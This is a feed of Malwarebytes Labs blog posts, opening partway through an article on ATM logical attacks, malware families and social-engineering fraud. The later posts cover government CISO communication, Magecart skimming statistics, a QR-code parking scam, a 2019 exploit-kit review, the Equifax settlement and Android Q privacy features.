In order for a logical attack to be successful, access to the ATM is needed. A simple way to do this is to use a tool, such as a drill, to make an opening to the casing so criminals can introduce another piece of hardware (a USB stick, for example) to deliver the payload. Some tools can also be used to pinpoint vulnerable points within the ATM’s frame or casing, such as an endoscope, which is a medical device with a tiny camera that is used to probe inside the human body.

If you think that logical attacks are too complex for the average cybercriminal, think again. For a substantial price, anyone with cash to spare can visit Dark Web forums and purchase ATM malware complete with easy how-to instructions. Because the less competent ATM fraudsters can use malware created and used by the professionals, the distinction between the two blurs.

Logical attack types

To date, there are two sub-categories of logical attacks fraudsters can carry out: malware-based attacks and black box attacks.

Malware-based attacks. As the name suggests, this kind of attack can use several different types of malware, including Ploutus, Anunak/Carbanak, Cutlet Maker, and SUCEFUL, which we’ll profile below. How they end up on the ATM’s computer or on its network is a matter we should all familiarize ourselves with.

Installed at the ATM’s PC:

  • Via a USB stick. Criminals load up a USB thumb drive with malware and then insert it into a USB port of the ATM’s computer. The port is either exposed to the public or behind a panel that one can easily remove or punch a hole through. As these ATM frames are not sturdy nor secure enough to counter this type of physical tampering, infecting via USB and external hard drive will always be an effective attack vector. In a 2014 article, SecurityWeek covered an ATM fraud that successfully used a malware-laden USB drive.
  • Via an external hard drive or CD/DVD drive. The tactic is similar to the USB stick but with an external hard drive or bootable optical disk.
  • Via infecting the ATM computer’s own hard drive. The fraudsters either disconnect the ATM’s hard drive to replace it with an infected one or they remove the hard drive from its ATM, infect it with a Trojan, and then reinsert it.

Installed at the ATM’s network:

  • Via an insider. Fraudsters can coerce or team up with a bank employee with ill-intent against their employer to let them do the dirty work for them. The insider gets a cut of the cashed-out money.
  • Via social engineering. Fraudsters can use spear phishing to target certain employees in the bank to get them to open a malicious attachment. Once executed, the malware infects the entire financial institution’s network and its endpoints, which include ATMs. The ATM then becomes a slave machine. Attackers can send instructions directly to the slave machine for it to dispense money and have money mules collect.

    Note that as criminals are already inside the FI’s network, a new opportunity to make money opens its doors: They can now break into sensitive data locations to steal information and/or proprietary data that they can further abuse or sell in the underground market.

Installed via Man-in-the-Middle (MiTM) tactics:

  • Via fake updates. Malware could be introduced to ATM systems via a bogus software update, as explained by Benjamin Kunz-Mejri, CEO and founder of Vulnerability Lab after he discovered (by accident) that ATMs in Germany publicly display sensitive system information during their software update process. In an interview, Kunz-Mejri said that fraudsters could potentially use the information to perform a MiTM attack to get inside the network of a local bank, run malware that was made to look like a legitimate software update, and then control the infected the ATM.

Black box attacks. A black box is an electronic device—either another computer, mobile phone, tablet, or even a modified circuit board linked to a USB wire—that issues ATM commands at the fraudster’s bidding. The act of physically disconnecting the cash dispenser from the ATM computer to connect the black box bypasses the need for attackers to use a card or get authorization to confirm transactions. Off-premise retail ATMs are likely targets of this attack.

A black box attack could involve social engineering tactics, like dressing up as an ATM technician, to allay suspicions while the threat actor physically tamper with the ATM. At times, fraudsters use an endoscope, a medical tool used to probe the human body, to locate and disconnect the cash dispenser’s wire from the ATM computer and connect it to their black box. This device then issues commands to the dispenser to push out money.

As this type of attack does not use malware, a black box attack usually leaves little to no evidence—unless the fraudsters left behind the hardware they used, of course.

Experts have observed that as reports of black box attacks have dropped, malware attacks on ATMs are increasing.

ATM malware families

As mentioned in part 1, there are over 20 strains of known ATM malware. We’ve profiled four of those strains to give readers an overview of the diversity of malware families developed for ATM attacks. We’ve also included links to external references you can read in case you want to learn more.

Ploutus. This is a malware family of ATM backdoors that was first detected in 2013. Ploutus is specifically designed to force the ATM to dispense cash, not steal card holder information. An earlier variant was introduced to the ATM computer via inserting an infected boot disk into its CD-ROM drive. An external keyboard was also used, as the malware responds to commands executed by pressing certain function keys (the F1 to F12 keys on the keyboard). Newer versions also use mobile phones, are persistent, target the most common ATM operating systems, and can be tweaked to make them vendor-agnostic.

Daniel Regalado, principal security researcher for Zingbox, noted in a blog post that a modified Ploutus variant called Piolin was used in the first ATM jackpotting crimes in the North America, and that the actors behind these attacks are not the same actors behind the jackpotting incidents in Latin America.

References on Ploutus:

Anunak/Carbanak. This advanced persistent malware was first encountered in the wild affecting Ukrainian and Russian banks. It’s a backdoor based on Carberp, a known information-stealing Trojan. Carbanak, however, was designed to siphon off data, perform espionage, and remotely control systems.

The Anunak/Carbanak admin panel (Courtesy of Kaspersky)

It arrives on financial institution networks as attachment to a spear phishing email. Once in the network, it looks for endpoints of interest, such as those belonging to administrators and bank clerks. As the APT actors behind Carbanak campaigns don’t have prior knowledge of how their target’s system works, they surreptitiously video record how the admin or clerk uses it. Knowledge gained can be used to move money out of the bank and into criminal accounts.

References on Anunak/Carbanak:

Cutlet Maker. This is one of several ATM malware families being sold in underground hacking forums. It is actually a kit comprised of (1) the malware file itself, which is named Cutlet Maker; (2) c0decalc, which is a password-generating tool that criminals use to unlock Cutlet Maker; and (3) Stimulator, another benign tool designed to display information about the target ATM’s cash cassettes, such as the type of currency, the value of the notes, and the number of notes for each cassette.

Cutlet Maker’s interface (Courtesy of Forbes)

References on Cutlet Maker:

SUCEFUL. Hailed as the first multi-vendor ATM malware, SUCEFUL was designed to capture bank cards in the infected ATM’s card slot, read the card’s magnetic strip and/or chip data, and disable ATM sensors to prevent immediate detection.

The malware’s name is derived from a typo—supposed to be ‘successful’—by its creator, as you can see from this testing interface (Courtesy of FireEye)

References on SUCEFUL:

Social engineering

Directly targeting ATMs by compromising their weak points, whether they’re found on the surface or on the inside, isn’t the only effective way for fraudsters to score easy cash. They can also take advantage of the people using the ATMs. Here are the ways users can be social engineered into handing over hard-earned money to criminals, often without knowing.

Defrauding the elderly. This has become a trend in Japan. Fraudsters posing as relatives in need of emergency money or government officials collecting fees target elderly victims. They then “help” them by providing instructions on how to transfer money via the ATM.

Assistance fraud. Someone somewhere at some point in the past may have been approached by a kindly stranger in the same ATM queue, offering a helping hand. Scammers uses this tactic so they can memorize their target’s card number and PIN, which they then use to initiate unlawful money transactions.

The likely targets for this attack are also the elderly, as well as confused new users who are likely first-time ATM card owners.

Shoulder surfing. This is the act of being watched by someone while you punch in your PIN using the ATM’s keypad. Stolen PIN codes are particularly handy for a shoulder surfer, especially if their target absent-mindedly leaves the area after retrieving their cash but hasn’t fully completed the session. Some ATM users walk away before they can even answer the machine when it asks if they have another transaction. And before the prompt disappears, the fraudster enters the stolen PIN to continue the session.

Eavesdropping. Like the previous point, the goal of eavesdropping is to steal the target’s PIN code. This is done by listening and memorizing the tones the ATM keys make when someone punches in their PIN during a transaction session.

Distraction fraud. This tactic swept through Britain a couple years ago. And the scenario goes like this: An unknowing ATM user gets distracted by the sound of dropping coins behind him/her while taking out money. He or she turns around to help the person who dropped the coins, not knowing that someone else is already either stealing the cash the ATM just spewed out or swapping a fake card to his real one. The ATM user looks back at the terminal, content that everything looked normal, then goes on their way. The person they helped, on the other hand, is either given the stolen card to or tells their accomplice the stolen card’s PIN, which he/she memorized when their target punched it in and before deliberately dropping the coins.

A still taken from Barclay’s public awareness campaign video on distraction fraud (Courtesy of This is Money) Continued vigilance for ATM users and manufacturers

Malware campaigns, black box attacks, and social engineering are problems that are actively being addressing by both ATM manufacturers and their financial institutions. However, that doesn’t mean that ATM users should let their guards down.

Keep in mind the social engineering tactics we outlined above when using an ATM, and don’t forget to keep a lookout for something “off” with the machine you’re interacting with. While it’s quite unlikely a user could tell if an information-stealer had compromised her ATM (until she saw the discrepancies in her transaction records later), there are some malware types that can physically capture cards.

If this happens, do not leave the ATM premises. Instead, record every detail in relation to what happened, such as the time it was captured, the ATM branch you use, and which transactions you made prior to realizing the card would not eject. Take pictures of the surroundings, the ATM itself, and attempt to stealthily snap any people potentially lingering about. Finally, call your bank and/or card issuer to report the incident and request card termination.

We would also like to point you back to part 1 of this series again, where we included a useful guideline for reference on what to look out for before dropping by an ATM outlet.

As always, stay safe!

The post Everything you need to know about ATM attacks and fraud: part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Making the case: How to get the board to invest in government cybersecurity

Malwarebytes - Thu, 08/01/2019 - 16:00

Security leaders are no longer simply expected to design and implement a security strategy for their organization. As a key member of the business—and one that often sits in the C-suite—CISOs and security managers must demonstrate business acumen. In fact, Gartner estimates by 2020, 100 percent of large enterprise CISOs will be asked to report to their board of directors on cybersecurity and technology risk at least annually.

Presenting to the board, demonstrating ROI, and designing security as a business enabler are all in the job description for CISOs today.  But when it comes to communicating with the board and executive management, CISOs in different verticals will have disparate challenges to address.

In a series of posts about CISO communication, we look at these varying issues and concerns across verticals. This month, we examine what security leaders in government positions need to be mindful of when working to get buy-in from higher levels.

For perspective, I tapped Dan Lohrmann. Lohrmann is a security veteran who led Michigan government’s cybersecurity and technology infrastructure teams from May 2002 to August 2014. Now, as CSO and Chief Strategist for Security Mentor, he still writes and comments regularly on the requirements for government cybersecurity officials.

What unique challenges do CISOs working in government have that differ from their peers in the private sector? 

There are many, but I’ll mention three.

First, in government, the people closest to the top executive are almost always political friends/allies of the governor or mayor or other top public sector leader. The majority of these most trusted people were “on the bus” when they ran for office. This means that many top executives literally campaigned with them through primaries and long days of political rallies, gave financially to their campaigns and more. These are the people who are in the “inner circle” and who are listened to the most by government leaders. They have unique access and long-term relationships which are very hard to gain if you were not “on the bus.” There is nothing equivalent in the private sector, because there are not open public elections.

Second, while building trust takes time and skill in both the public and private sectors, the timelines for projects are often different. In government, there are set cycles which tend to follow election calendars, which often run for four years, but can range from two up to six. Investments and priorities with the board—often the cabinet or committee or council—also follow unique budget cycles that include getting legislative and perhaps other support. The timing of requests is paramount. Learn the lingo and metrics of these groups. How do they measure success?

Third, government rules, procedures, processes, approvals, oversight, and audits are often very complex and unique. It can take years to fully understand all the fiefdoms and side deals that occur in government silos. In the private sector, financial or staff support from the top leaders is generally acted upon swiftly. But, in contrast, I have seen government leaders make clear decisions, only to see the “government bureaucracy” kill projects through a long list of internal maneuvers and delaying tactics.

What do government CISOs need to keep in mind when they communicate with either the board or other governing body in their organization?

Know where you stand, not just on the org chart, but in the pecking order of “trust circles” in government. If you are not in the inner circle—and you probably are not if you were not on the bus—ask who is? Also, strive to at least be in the middle circle of career professionals who are trusted to “get things done” with a track record of career success. Build trusted relationships with those on the inner circle (or at least in the middle circle), where possible. Do lunch with the governments leaders. Learn the top governments leaders’ priorities and campaign promises. Get invited to the strategy sessions and priority setting meetings that impact technology and security. Make your case in different ways (from elevator pitches to formal cybersecurity presentations).   

Second, gain a good understanding of how things get done in government. Read case studies of successful projects. Learn budget timelines for official (and unofficial) proposals. Always have a list of current needs when “fallout money” becomes available. Side note: I was often told “no money for that project” for months or even years, only to have a budget person come up to me at the end of the fiscal year saying I need the spending details now. Lesson: Be ready with your hot needs list.      

Third, get to know the business leaders in the agencies who may be more sympathetic to your cause, even if/when the top elected leaders are not. Find a business champion in your organization who is backing cyber change in powerful ways and get behind that snowplow. Surprisingly, this may not be an IT manager. For example, I’ve seen security champions in the transportation and treasury departments. The senior execs in treasury were in charge of credit cards and needed payment card industry compliance. They pushed for extensive improvements in our network controls by demonstrating the penalties of noncompliance.  

Fourth, do regular cyber roadshows at least annually to business areas throughout government. Build a regular cadence for updates on what’s happening, and don’t assume this is a one-time deal. Go over the good, bad, and ugly and action items in security. Talk about what is working and where improvements are needed to be done with metrics.

Fifth, form a cyber committee (or better, utilize an existing technology sub-committee) to get executive buy-in from middle management in business areas. Get security ambassadors to help make the case through front-line non-IT leaders who are respected.

What tips for effective communication would you offer CISOs in government agencies?

Two tips and a word of caution.

I often hear CISOs and other government leaders say there is no money, or hiring, and that their projects never get funded. My response is to “get on the boats leaving the dock.” That is, what projects are getting funding? Are you, or your top deputies, in those important meetings? For example, a new tax database is a top priority, but you are not invited to participate. Why? Make sure security is built into all strategic projects. Build trust through getting involved in top priorities—or, if you can’t beat them, join them.  

Another tip is to strategically partner with others. This means building bridges through grants, other government groups like the MS-ISAC, police, FBI, DHS, etc. Many of these groups usually have the reputations and a level of trust associated with them, even when new leaders don’t. If you study what has worked and not worked in the past, you can benefit greatly from these relationships. This can also include relationships with the private sector.    

One final word of caution: When a new top leader is elected, the inner circle will inevitably change. Staying effective during this transition, especially if political parties change, is a huge challenge. Nevertheless, cybersecurity is one of the few high-priority topics which tends to be nonpartisan. Stay focused on protecting data and critical infrastructure, and you can survive, even during very difficult administration changes.    

The post Making the case: How to get the board to invest in government cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No summer break for Magecart as web skimming intensifies

Malwarebytes - Thu, 08/01/2019 - 15:00

This summer, you are more likely to find the cybercriminal groups Magecart client-side rather than poolside.

Web skimming, which consists of stealing payment information directly from within the browser, is one of today’s top web threats. Magecart, the group behind many of these attacks, gained worldwide attention with the British Airways and TicketMaster breaches, costing the former £183 million ($229 million) in GDPR fines.

Skimmers, sniffers, or swipers (all valid terms used interchangeably over the years) have been around for a long time and fought against mostly on the server side by security companies like Sucuri that perform website remediation.

Today, web skimming is a booming business comprised of numerous different threat groups, ranging from mere copycats to more advanced actors. During the past few months, we have witnessed a steady increase in the number of hacked e-commerce sites and skimming scripts. In this post, we share some statistics on web skimming based on our telemetry, as well as what Malwarebytes is doing to protect online shoppers from this threat.

65K theft attempts blocked in July

During the past few months, we have been observing a growing number of blocks related to skimmer domains and exfiltration gates. This activity drastically increased as the summer rolled out, most notably with peaks around July 4 (Figure 1).

Figure 1: Web blocks for skimmer domains and gates recorded in our telemetry

In the month of July alone, Malwarebytes blocked over 65,000 attempts to steal credit card numbers via compromised online stores. Fifty-four percent of those shoppers were from the United States, followed by Canada, with 16 percent and Germany with 7 percent, as seen in Figure 2.

Figure 2: Top 10 countries for Magecart activity in July

In addition to a greater number of compromised e-commerce sites (which often times have been injected with more than one skimmer), we also documented large and ongoing spray and pray attacks on Amazon S3 buckets.

Many skimmers, too many groups

Skimmer code can help to identify the groups behind them, but it is becoming increasingly difficult to do so. For instance, the Inter kit that is sold underground is used by different threat actors, and there are many copycats reusing existing code for their own purpose as well.

Figure 3: Fragments from different skimmer scripts

Having said that, skimmers typically have a similar set of functionalities:

  • Looking at the current page to see if it’s the checkout
  • Making sure developer tools are not in use
  • Identifying form fields by their ID
  • Doing some validation of the data
  • Encoding the data (Base64 or AES)
  • Exfiltrating the data to their external gate or on the compromised store

While some skimmers are simple and easily readable JavaScript code, more and more are using some form of obfuscation. This is an effort to thwart detection attempts, and it also serves to hide certain pieces of information, such as the gates (criminal-controlled servers) that are used to collect the stolen data. Fellow researchers also noted the same for the data exfiltration process, although strange encryption may actually raise suspicions.

Magecart protection, client-side

Combating skimmers ought to start server-side with administrators remediating the threat and implementing a proper patching, hardening, and mitigation regimen. However, based on our experience, a great majority of site owners are either oblivious or fail to prevent re-infections.

A more effective approach consists of filing abuse reports with CERTs and working with partners to take a more global approach by tackling the criminal infrastructure. But even that is no guarantee, especially when threat actors rely on bulletproof services.

We often get asked how consumers can protect themselves from Magecart threats. Generally speaking, it’s better to stick to large online shopping portals rather than smaller ones. But, this piece of advice hasn’t always held true in the past.

At Malwarebytes, we identify those skimmer domains and exfiltration gates. This means that by blocking one malicious hostname or IP address, we can protect shoppers from dozens, if not hundreds, of malicious or compromised online stores at once.

In Figure 4, we see how Malwarebytes intercepts a skimmer that had been injected into the website for Pelican Products before the customer entered their information. (We reported this breach to Pelican and it appears that the site is now clean).

Figure 4: Magecart theft attempt blocked in realtime

The recent headlines about data breaches have eroded people’s trust in entering personal information online. And yet, there are still many myths that persist and give a false sense of security. For example, the trust seals many merchants proudly display or even their use of digital certificates (HTTPS) will not protect you from a Magecart attack.

There is no doubt that Magecart threat actors, despite their diversity, are in it for the long game and because the attack surface is quite vast, we are bound to observe new schemes in the near future.

The post No summer break for Magecart as web skimming intensifies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

QR code scam can clean out your bank account

Malwarebytes - Wed, 07/31/2019 - 16:05

“Excuse me sir, can I ask you for a favor? I want to pay for parking my car in this spot, but there are no machines around that accept cash. If I give you five dollars in cash, can you pay the parking for me? All you need to do is scan this QR code with your banking app.”

Of course, John felt the need to help this person, but since no good deed goes unpunished, he came home only to find that every penny he had in his bank account had vanished. So, all he had to last him through the rest of the month was the fiver in his wallet.

A week ago, one of the Netherlands’ local police departments issued a warning that this type of scam was making the rounds. Meanwhile, two suspects have been apprehended after robbing dozens of people and amassing tens of thousands of Euros.

As far as the police know, these scammers have been active in two cities so far. They left the first city behind when the police started to hand out flyers about the parking scam. And they were caught red-handed in the second city. It may have helped that some of the potential victims had read the warnings by police on social media. These were issued along with warning signs posted on the parking lots and flyers handed out that provided details about the scammers and a request to call the police if anyone saw them at work.

But in case criminals using this tactic are active in other European or US cities, we wanted to bring this particular scam into light.

What is a QR code exactly?

A QR (Quick Response) code is nothing more than a two-dimensional barcode. This type of code was designed to be read by robots that keep track of produced items in a factory. As a QR code takes up a lot less space than a legacy barcode, its usage soon spread.

Modern smartphones can easily read QR codes, as a camera and a small piece of software is all it takes. Some apps, like banking apps, have QR code-reading software incorporated to make it easier for users to make online payments. In other cases, QR codes are used as part of a login procedure.

QR codes are easy to generate and hard to tell apart from one another. To most human eyes, they all look the same. More or less like this:

UL to my contributor profile here

Even if we can spot any differences, we are unable to see what they stand for, exactly. And that is exactly what this scam banks on. To us, they all look the same—one payment instruction for five dollars looks just like any other.

How does this scam work?

Basically, it does the same as when you would enter your login credentials on a banking phish site. The scammers used social engineering to con victims into allowing them to scan the QR code on their own phone. By doing so, the victims provided the scammers with the login credentials to their banking environment.

With those in hand, it’s easy for the threat actors to make some payments on your behalf—into accounts under their control, obviously. It is likely that they used money mules to convert those payments into cash they could then spend freely without raising suspicion.

Other QR scams

Besides the fake banking environment scam, there have been reports of QR codes that were rigged to download malware onto the victim’s device. Also, criminals have been known to replace public and unguarded QR codes with their own so that payments would flow into their pockets.

For example, in China where bike-sharing is immensely popular and you pay in advance to unlock the bike, it can be profitable for criminals to replace the QR codes on a large number of bikes with some of their own. This could bring in a lot of (small) payments into the threat actor’s account, and many potential bike renters would shrug it off when the bike fails to unlock and move on to the next one to try their luck.

How can I protect myself?

There are a few things users can do to keep safe from QR code scams:

  • If you are using QR codes to make a payment, pay close attention to the details shown to you before you confirm the payment.
  • Use QR code payments only in circumstances that you consider normal. Don’t be rushed or talked into paying in a way that you are not completely familiar with.
  • Alarm your bank and work with them to change your credentials as soon as you suspect foul play.
  • Treat a QR code like any other link. Don’t follow it if you don’t know where it originated from, or if you don’t fully trust the source.
  • If you are using a QR code scanner or thinking about installing one, consider using one that uses built-in filters. Or, you can use it in combination with security software that blocks malicious sites, because every QR code scanner I have seen automatically takes users to the link it reads from the QR code.

To users, QR codes offer an advantage over having to type out a full URL in a browser address bar on their device. So to advertisers, this results in a higher turn-around and forgoes the need to use URL-shorteners.

But QR codes have one problem in common with the shortened URLs: Users cannot immediately see where the link is going to lead them. And that is where the problem lies and what offers criminals the chance to abuse the technology.

Luckily for John, his bank reimbursed him for the damages, but you can imagine the hassle he had to go through and how stupid he felt for falling for such a scam. But not every bank in every country will reimburse you fully for being scammed, so other victims may end up drawing the short straw.

Stay safe, everyone!

The post QR code scam can clean out your bank account appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Exploit kits: summer 2019 review

Malwarebytes - Tue, 07/30/2019 - 16:20

In the months since our last spring review, there has been some interesting activity from several exploit kits. While the playing field remains essentially the same with Internet Explorer and Flash Player as the most-commonly-exploited pieces of software, it is undeniable that there has been a marked effort from exploit kit authors to add some rather cool tricks to their arsenal.

For example, several exploit kits are using session-based keys to prevent “offline” replays. This mostly affects security researchers who might want to test the exploit kit in the lab under different scenarios. In other words, a saved network capture won’t be worth much when it comes to attempting to reenact the drive-by in a controlled environment.

The same is true for better detection of virtual machines and network tools (something known as fingerprinting). Combining these evasion techniques with geofencing and VPN detection makes exploit kit hunting more challenging than in previous quarters.

Threat actors continue to buy traffic from ad networks and use malvertising as their primary delivery method. Leveraging user profiling (their browser type and version, country of origin, etc.) from ad platforms, criminals are able to maintain decent load rates (successful infection per drive-by attempts).

Summer 2019 overview
  • Spelevo EK
  • Fallout EK
  • Magnitude EK
  • RIG EK
  • GrandSoft EK
  • Underminer EK
  • GreenFlash EK

Internet Explorer’s CVE-2018-8174 and Flash Player’s CVE-2018-15982 are the most common vulnerabilities, while the older CVE-2018-4878 (Flash) is still used by some EKs.

Spelevo EK

Spelevo EK is the youngest exploit kit, originally discovered in March 2019, but by no means is it behind any of its competitors.

Payloads seen: PsiXBot, IcedID

Fallout EK

Fallout EK is perhaps one of the more interesting exploit kits. Nao_Sec did a thorough writeup on it recently, showing a number of new features in its version 4 iteration.

Payloads seen: AZORult, Osiris, Maze ransomware

Magnitude EK

Magnitude EK continues to target South Korea with its own Magniber ransomware in steady malvertising campaigns.

Payload seen: Magniber ransomware


RIG EK is still kicking around via various malvertising chains and perhaps offers the most diversity in terms of the malware payloads it serves.

Payloads seen: ERIS, AZORult, Phorpiex, Predator, Amadey, Pitou

GrandSoft EK

GrandSoft EK remains the weakest exploit kit of the bunch and continues to drop Ramnit in Japan.

Payload seen: Ramnit

Underminer EK

Underminer EK is a rather complex exploit kit with a complex payload which we continue to observe via the same delivery chain.

Payload seen: Hidden Bee

GreenFlash Sundown EK

The elusive GreenFlash Sundown EK marked a surprise return via its ShadowGate in a large malvertising campaign in late June.

Payloads seen: Seon ransomware, Pony, coin miner


A few other drive-bys were caught during the past few months, although it might be a stretch to call them exploit kits.

  • azera drive-by used the PoC for CVE-2018-15982 (Flash) to drop the ERIS ransomware
  • Radio EK leveraged CVE-2016-0189 (Internet Explorer) to drop AZORult
Three years since Angler EK left

June 2016 is an important date for the web threat landscape, as it marks the fall of Angler EK, perhaps one of the most successful and sophisticated exploit kits. Since then, exploit kits have never regained their place as the top malware delivery vector.

However, since our spring review, we can say there have been some notable events and interesting campaigns. While it’s hard to believe that users are still running machines with outdated Internet Explorer and Flash Player versions, this renewed activity proves us wrong.

Although we have not mentioned router-based exploit kits in this edition, they are still a valid threat that we expect to grow in the coming months. Also, if exploit kit developers start branching out of Internet Explorer more, we could see far more serious attacks.

Malwarebytes users are protected against the aforementioned drive-by download attacks thanks to our products’ anti-exploit layer of technology.

Indicators of Compromise (URI patterns)

Spelevo EK


Fallout EK


Magnitude EK




GrandSoft EK


Underminer EK


GreenFlash Sundown EK


The post Exploit kits: summer 2019 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to get your Equifax money and stay safe doing it

Malwarebytes - Tue, 07/30/2019 - 15:00

Following the enormous data breach of Equifax in 2017—in which roughly 147 million Americans’ suffered the loss of their Social Security numbers, addresses, credit card and driver’s license information, birthdates, and more—the company has agreed to a settlement with the US Federal Trade Commission, in which it will pay at least $650 million.

Much of that settlement—up to $425 million—is reserved for you, the consumers. Here’s how you can see if you’re eligible for a payment.

First, you can check if your sensitive data was compromised during the 2017 data breach by going to Equifax’s new settlement website:

It’s important to quickly note here that this website, which does not look like Equifax’s regular website, is a reported improvement from the last time Equifax tried to set up its own response, which, in the immediate aftermath of the 2017 breach, was described as “completely broken at best, and little more than a stalling tactic or sham at worst.”

Back to that settlement money: By inputting your last name and the last six digits of your Social Security Number (which is too many numbers, we should say), you can find out if you’re eligible for a claim of, at the very least, either 10 years of free credit monitoring or $125 paid through either a check or a pre-paid card.

You can file a claim at Equifax’s web portal here:

Depending on how the 2017 data breach affected you, you may be eligible for more payments.

For example, if you spent time trying to recover from identity theft or fraud that stemmed from Equifax’s data breach, you can be paid $25 per hour for each hour you spent on that work. That work includes placing and removing credit freezes and purchasing credit monitoring services.

Further, if you actually lost money from identity theft or fraud caused by the breach, you can make a claim to be reimbursed for up to $20,000. Documented evidence must be provided.

Beware the scams

Another corporate data breach settlement with the US government means another moment for heightened cybersecurity vigilance.

Equifax’s extremely broad settlement is, if you’ll pardon our stretched metaphor, akin to a dead whale in the open ocean: Sharks are coming.

As with any major news in America, especially news that affects more than 100 million people, the opportunity for cybercriminal attack is high. For example, after the European Union’s General Data Protection Regulation (GDPR) came into effect, countless company emails flooded Americans’ inboxes. Cybercriminals were not far behind, and they sent their own phishing emails that masqueraded as legitimate notices.

The same could happen with the Equifax settlement.

Remember, there is only one website right now to check if you’re eligible for a claim, and it’s the one we’ve listed above.

With the breach once again in everyone’s minds, it’s also a good time to remember how to protect yourself from identity theft. Revisit our blog from 2017 that covers various safety precautions, including obtaining credit monitoring, refusing to reply to texts and calls from unknown phone numbers, and stepping up your password protocol (don’t repeat passwords, make them complex). And for even more in-depth information on identity theft, take a look at this comprehensive article in our cybersecurity basics hub.

Stay safe, everyone.

The post How to get your Equifax money and stay safe doing it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Dark Android Q rises

Malwarebytes - Mon, 07/29/2019 - 17:55

Android Q, the upcoming 10th major release of the Android mobile operating system, was developed by Google with three major themes in mind: innovation, security, and privacy. Today, we are going to focus mostly on security and privacy, although there are still many potential changes and updates on the horizon that can be discussed.


Privacy has been a top priority in developing Android Q, as it’s important today to give users control and transparency over how their information is collected and used by apps and by our phones. There are significant changes made in Android Q across the platform to improve privacy, and we are going to inspect them one-by-one.

Note: Developers will need to review new privacy features and test their apps. Impacts can vary based on each app’s core functionality, targeting, and other factors. 

Picture 1 Device location

Let’s start with location. Apps can still ask the user for permission to access location, but now in Android Q, the user sees a larger screen with more choices on when to allow access to location, as shown in Picture 1. Users will be able to give apps access to location data all the time or only when the app is in focus (in use and in the foreground).

This additional control became possible by Android Q introducing a new location permission ACCESS_BACKGROUND_LOCATION, that allows an app to access location in the background.

A detailed guide is available on how to adapt your app for the new location controls. 

Scoped storage

Outside of location, a new feature called “scoped storage” was introduced to give users more security and reduce app clutter. Android Q will still use the READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE permissions, but now apps targeting Android Q by default are given a filtered view into external storage.

Such apps can only see their specific directory and specific types of media, thus need no permission to read or write any file in this folder. It also allows a developer to have their own space on the storage of your device that is private without asking for any specific permissions.

Note: There is a guide that describes how files are included in the filtered view, as well as how to update your app so that it can continue to share, access, and modify files that are saved on an external storage device.

From the security standpoint, this is a beneficial update. It stops malicious apps that depend on you granting access to sensitive data because you did not read what you saw in the dialog and just clicked “yes.”

Background restrictions

Another important change is that developers have created restrictions on launching activities from the background without user interaction. This behavior helps reduce interruptions and keeps the user more in control of what’s shown on her screen.

This new change takes effect on all apps running on Android Q. Even if your app has API level 28 or lower and was originally installed on a device with Android 9, restrictions will work after the device is upgraded to Android Q.

Note: Apps running on Android Q can start activities only when one or more of the following conditions are met.

Data and identifiers

To prevent tracking, starting in Android Q, Google will require app developers to request a special privileged permission (READ_PRIVILEGED_PHONE_STATE) before they can access the device’s non-resettable identifiers, both IMEI and the serial number.

Note: Read the best practices to choose the right identifiers for your specific case, as many don’t need non-resettable device identifiers (for analytics purposes, for example).

Also, Android Q devices will now transmit a randomized MAC address by default. Although Google introduced MAC address randomization in Android 6.0, devices could only broadcast a random MAC address if the smartphone initiated a background Wi-Fi or Bluetooth scan. It’s worth mentioning, however, that security researchers proved they can still track devices with randomized MAC addresses.

Wireless network restrictions

Another new feature in Android Q is that apps cannot enable or disable Wi-Fi. The WifiManager.setWifiEnabled() method always returns false.

As of now, with Android Q users are prompted to enable or disable Wi-Fi via the Settings Panel, an API which allows apps to show settings to users in the context of their app.

What’s more, to protect user privacy, manual configuration of the list of Wi-Fi networks is now restricted to system apps and device policy controllers (DPCs). A given DPC can be either the device owner or the profile owner.


Android Q changed the scope of the READ_FRAME_BUFFER, CAPTURE_VIDEO_OUTPUT and CAPTURE_SECURE_VIDEO_OUTPUT permissions. Now they’re signature-access only, so they will prevent silent access to the device’s screen content.

Picture 2

Apps that need access to the device’s screen content will use the MediaProjection API. If your app targets Android 5.1 (API level 22) or lower, users will see a permissions screen when running your app on Android Q for the first time, as shown in Picture 2. This gives users the opportunity to cancel/change access to permissions that the system previously granted to the app while installing.

In addition, Android Q introduces a new ACTIVITY_RECOGNITION permission for apps that need to detect the user’s step count or classify the user’s physical activity. This is done for the users to see how device sensor data is used in Settings.

Note: If your app relies on data from other built-in sensors on the device, such as the accelerometer and gyroscope, you don’t need to declare this new permission in your app.


Android Pie introduced the BiometricPrompt API to help apps utilize biometrics, including face, fingerprint, and iris. To keep users secure, the API was expanded in Android Q to support additional use-cases, including both implicit and explicit authentication.

If we are talking about explicit authentication, users must perform an action to proceed. That can be a tap to the fingerprint sensor or, if it’s face or iris authentication, then the user must click an additional button to proceed. All high-value payments have to be done via explicit flow, for example.

Implicit flow does not require an additional user action. Most often, sign-in and autofill are used in these cases, as there is no need to perform complex actions on simple, unimportant transactions that can be easily reversed.

One more interesting change made in Android Q is support for TLS 1.3. It is claimed that secure connections can be established as much as 40 percent faster with TLS 1.3 compared to TLS 1.2. From a security perspective, TLS 1.3 is cleaner, less error prone, and more reliable. And from a privacy perspective, TLS 1.3 encrypts more of the handshake to better protect the identities of the participating parties.

Another handy new feature in BiometricPrompt is the ability to check if a device supports biometric authentication prior to invoking BiometricPrompt. This is useful when the app wants to show an “enable biometric sign-in” or similar item in their sign-in page or in-app settings menu. 

The last feature we wanted to point out is Adiantum, a storage encryption that protects your data if your phone falls into someone else’s hands. Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration to ensure that all devices can be encrypted. 

In Android Q, Adiantum will be part of the Android platform, and Google intends to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms.

Beta 5 and beyond

Android Q Beta 1 was launched on March 13, and we already have Beta 5 available to download. If you would like to try the Beta version, please proceed to to check if your device is in the supported list and download the beta.

The Android 10 Q release date timeline

There is still one more beta before the final build drops sometime before Q3 is over, according to timeline. Developers should dive into Android Q and start learning about the new features and APIs they can use in their apps before adjusting.

